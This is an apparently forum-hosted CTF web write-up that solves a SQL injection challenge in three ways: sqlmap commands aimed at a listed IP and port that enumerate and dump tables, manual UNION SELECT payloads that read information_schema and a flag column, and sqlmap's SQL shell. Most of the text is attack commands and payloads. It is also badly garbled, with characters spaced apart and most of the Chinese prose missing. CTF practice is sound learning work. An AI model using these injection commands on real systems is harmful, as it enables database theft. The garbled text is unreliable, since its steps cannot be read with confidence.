[26897] 2020-01-13_CTF笔记-Web第1弹-看我如何用多种姿势搞定一个SQL注入点

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-19
2020-01-13_CTF笔记-Web第1弹-看我如何用多种姿势搞定一个SQL注入点 C T F - W e b 1 - 姿 S Q L M s 0 8 0 6 7   2 0 2 0 - 0 1 - 1 3 西   1 .   s q l m a p 2 .   u n i o n 3 .   s q l - s h e l l   Q C T F - 2 0 1 8 线 C T F N B 5 e n j o y   y o u r s e l f 姿 1 s q l m a p p o s t s q l m a p p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - d b s - u   - - d a t a   - - d b s   2 姿 使 p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - d b m s   m y s q l   - - c u r r e n t - d b - - d b m s   m y s q l   m y s q l - - c u r r e n t - d b   西 西   .
n e w s n e w s p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - d b m s   m y s q l   - D   n e w s   - - t a b l e s - D   n e w s   - - t a b l e s   2 s e c r e t _ t a b l e p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - d b m s   m y s q l   - D   n e w s   - T   s e c r e t _ t a b l e   - - c o l u m n s - T   s e c r e t _ t a b l e   - - c o l u m n s  
2 i d f 1 4 g f l a g d i s c o p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - d b m s   m y s q l   - D   n e w s   - T   s e c r e t _ t a b l e   - - d u m p - - d u m p   f i r s t   b l o o d Q C T F { s q 1 _ i n J e c 7 i o n _ e z z z } 姿 2 u n i o n 1 2 3 '   - -   ' - - 1 2 3 '   o r d e r   b y   3 - -
1 2 3 '   u n i o n   s e l e c t   1 , 2 , 3 - - 1 2 3 '   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( t a b l e _ n a m e ) , 3   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )   - - 1 2 3 '   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( c o l u m n _ n a m e ) , 3   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' s e c r e t _ t a b l e ' - - 1 2 3 '   u n i o n   s e l e c t   1 , g r o u p _ c o n c a t ( f l 4 g ) , 3   f r o m   s e c r e t _ t a b l e - - 1 '   u n i o n   s e l e c t   1 , 2 , 3   # 2 3 1 '   u n i o n   s e l e c t   1 , d a t a b a s e ( ) , 3 #
2 n e w s 1 '   u n i o n   s e l e c t   1 , t a b l e _ n a m e , 3   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a   = ' n e w s '   # 2 1 '   u n i o n   s e l e c t   1 , c o l u m n _ n a m e , 3   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e   = ' s e c r e t _ t a b l e '   # f 1 4 g : 1 '   u n i o n   s e l e c t   1 , f l 4 g , 3   f r o m   s e c r e t _ t a b l e   w h e r e   i d   = ' 1 '   #
d o u b l e   k i l l 姿 3 s q l - s h e l l   p y t h o n   s q l m a p . p y   - u   h t t p : / / 1 1 1 . 1 9 8 . 2 9 . 4 5 : 5 0 7 9 7 /   - - d a t a = " s e a r c h = a "   - - b a t c h   - - s q l - s h e l l - - b a t c h   - - s q l - s h e l l   s q l - s h e l l s q l - s h e l l d a t a b a s e ( ) ; n e w s s e l e c t   g r o u p _ c o n c a t ( t a b l e _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . t a b l e s   w h e r e   t a b l e _ s c h e m a = d a t a b a s e ( )
2 n e w s s e c r e t _ t a b l e s e l e c t   g r o u p _ c o n c a t ( c o l u m n _ n a m e )   f r o m   i n f o r m a t i o n _ s c h e m a . c o l u m n s   w h e r e   t a b l e _ n a m e = ' s e c r e t _ t a b l e ' 2 i d f 1 4 g f l a g s e l e c t   i d , f 1 4 g   f r o m   s e c r e t _ t a b l e   l i m i t   0 , 1 f l a g 姿 2 3 3 3 ~ 1 2 ~ - - - - - - - - - - - - - - - 线 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则